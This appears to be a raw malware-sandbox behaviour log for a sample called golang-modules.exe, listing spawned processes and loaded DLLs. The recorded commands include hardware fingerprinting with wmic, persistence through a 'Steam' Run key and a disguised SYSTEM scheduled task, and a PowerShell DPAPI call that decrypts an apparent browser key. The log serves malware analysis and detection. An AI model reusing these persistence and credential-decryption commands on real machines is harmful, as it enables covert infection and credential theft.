Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\user\Desktop\golang-modules.exe" /fJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductNameJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic bios get smbiosbiosversionJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\reg.exe reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\find.exe find /i "Speed"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
